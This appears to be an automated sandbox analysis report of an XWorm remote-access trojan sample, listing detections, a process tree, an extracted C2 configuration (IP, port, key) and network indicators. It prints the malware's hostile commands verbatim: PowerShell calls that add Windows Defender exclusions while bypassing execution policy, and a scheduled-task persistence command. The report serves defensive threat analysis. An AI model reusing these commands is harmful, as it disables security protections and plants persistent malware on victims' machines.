Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
com surrogate.exe

Overview

General Information

Sample name:com surrogate.exe
Analysis ID:1575693
MD5:8843d79e5ece984ef952051cb5b4f601
SHA1:72bb266a7aae0320f05276a0ed42753c2dc07f2b
SHA256:80d44bb082a49dd49bf5926ea31ca0c225725daa4ba0614ae3ef1e121fdef89c
Tags:exeXWormuser-lontze7
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • com surrogate.exe (PID: 1184 cmdline: "C:\Users\user\Desktop\com surrogate.exe" MD5: 8843D79E5ECE984EF952051CB5B4F601)
    • powershell.exe (PID: 3448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7088 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchostt.exe (PID: 4192 cmdline: C:\Users\user\svchostt.exe MD5: 8843D79E5ECE984EF952051CB5B4F601)
  • svchostt.exe (PID: 4136 cmdline: "C:\Users\user\svchostt.exe" MD5: 8843D79E5ECE984EF952051CB5B4F601)
  • svchostt.exe (PID: 5916 cmdline: "C:\Users\user\svchostt.exe" MD5: 8843D79E5ECE984EF952051CB5B4F601)
  • svchostt.exe (PID: 7068 cmdline: C:\Users\user\svchostt.exe MD5: 8843D79E5ECE984EF952051CB5B4F601)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "147.185.221.22"], "Port": 48990, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "msedge.exe", "Version": "XWorm V5.2"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
com surrogate.exeJoeSecurity_XWormYara detected XWormJoe Security
    com surrogate.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      com surrogate.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xb64c:$s6: VirtualBox
      • 0xb5aa:$s8: Win32_ComputerSystem
      • 0xcada:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xcb77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xcc8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xc0c8:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\svchostt.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\svchostt.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\svchostt.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xb64c:$s6: VirtualBox
          • 0xb5aa:$s8: Win32_ComputerSystem
          • 0xcada:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xcb77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xcc8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xc0c8:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xb44c:$s6: VirtualBox
              • 0xb3aa:$s8: Win32_ComputerSystem
              • 0xc8da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xc977:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xca8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xbec8:$cnc4: POST / HTTP/1.1
              00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xcd7c:$s6: VirtualBox
                • 0xccda:$s8: Win32_ComputerSystem
                • 0xe20a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xe2a7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xe3bc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xd7f8:$cnc4: POST / HTTP/1.1
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.com surrogate.exe.9b0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.com surrogate.exe.9b0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.com surrogate.exe.9b0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xb64c:$s6: VirtualBox
                    • 0xb5aa:$s8: Win32_ComputerSystem
                    • 0xcada:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xcb77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xcc8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xc0c8:$cnc4: POST / HTTP/1.1
                    0.2.com surrogate.exe.2d2f730.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      0.2.com surrogate.exe.2d2f730.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x984c:$s6: VirtualBox
                      • 0x97aa:$s8: Win32_ComputerSystem
                      • 0xacda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xad77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xae8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xa2c8:$cnc4: POST / HTTP/1.1
                      Click to see the 3 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\com surrogate.exe", ParentImage: C:\Users\user\Desktop\com surrogate.exe, ParentProcessId: 1184, ParentProcessName: com surrogate.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', ProcessId: 3448, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\com surrogate.exe", ParentImage: C:\Users\user\Desktop\com surrogate.exe, ParentProcessId: 1184, ParentProcessName: com surrogate.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', ProcessId: 3448, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\svchostt.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\com surrogate.exe, ProcessId: 1184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchostt
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\com surrogate.exe", ParentImage: C:\Users\user\Desktop\com surrogate.exe, ParentProcessId: 1184, ParentProcessName: com surrogate.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', ProcessId: 3448, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\com surrogate.exe, ProcessId: 1184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnk
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\com surrogate.exe", ParentImage: C:\Users\user\Desktop\com surrogate.exe, ParentProcessId: 1184, ParentProcessName: com surrogate.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', ProcessId: 3448, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Schedule system process
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\com surrogate.exe", ParentImage: C:\Users\user\Desktop\com surrogate.exe, ParentProcessId: 1184, ParentProcessName: com surrogate.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe", ProcessId: 7088, ProcessName: schtasks.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-16T08:37:58.894044+010028559241Malware Command and Control Activity Detected192.168.2.449791147.185.221.2248990TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: com surrogate.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\svchostt.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Found malware configuration
                      Source: com surrogate.exeMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "147.185.221.22"], "Port": 48990, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "msedge.exe", "Version": "XWorm V5.2"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\svchostt.exeReversingLabs: Detection: 81%
                      Multi AV Scanner detection for submitted file
                      Source: com surrogate.exeVirustotal: Detection: 69%Perma Link
                      Source: com surrogate.exeReversingLabs: Detection: 81%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\svchostt.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: com surrogate.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: com surrogate.exeString decryptor: 127.0.0.1,147.185.221.22
                      Source: com surrogate.exeString decryptor: 48990
                      Source: com surrogate.exeString decryptor: <123456789>
                      Source: com surrogate.exeString decryptor: <Xwormmm>
                      Source: com surrogate.exeString decryptor: XWorm V5.2
                      Source: com surrogate.exeString decryptor: msedge.exe
                      Source: com surrogate.exeString decryptor: %Userprofile%
                      Source: com surrogate.exeString decryptor: svchostt.exe
                      Source: com surrogate.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: com surrogate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLL
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\wshext.dll

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49791 -> 147.185.221.22:48990
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 127.0.0.1
                      Source: Malware configuration extractorURLs: 147.185.221.22
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: com surrogate.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\svchostt.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.4:49791 -> 147.185.221.22:48990
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 147.185.221.22 147.185.221.22
                      Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: powershell.exe, 00000009.00000002.2152559804.00000131EF9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.verisign.
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2897221401.0000000002D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: com surrogate.exe, svchostt.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000001.00000002.1859144540.000001ED5BC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1968193322.00000214D4FC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2118773278.0000013190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000001.00000002.1839830042.000001ED4BDFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C5179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839830042.000001ED4BBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.0000016328151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000001.00000002.1839830042.000001ED4BDFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C5179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000001.00000002.1865579182.000001ED63FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                      Source: powershell.exe, 00000009.00000002.2155134281.00000131EFB40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coV
                      Source: powershell.exe, 00000009.00000002.2155134281.00000131EFB40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.i
                      Source: powershell.exe, 00000001.00000002.1839830042.000001ED4BBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.0000016328151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000001.00000002.1859144540.000001ED5BC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1968193322.00000214D4FC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2118773278.0000013190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: com surrogate.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.com surrogate.exe.2d2f730.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\svchostt.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E23610_2_00007FFD9B7E2361
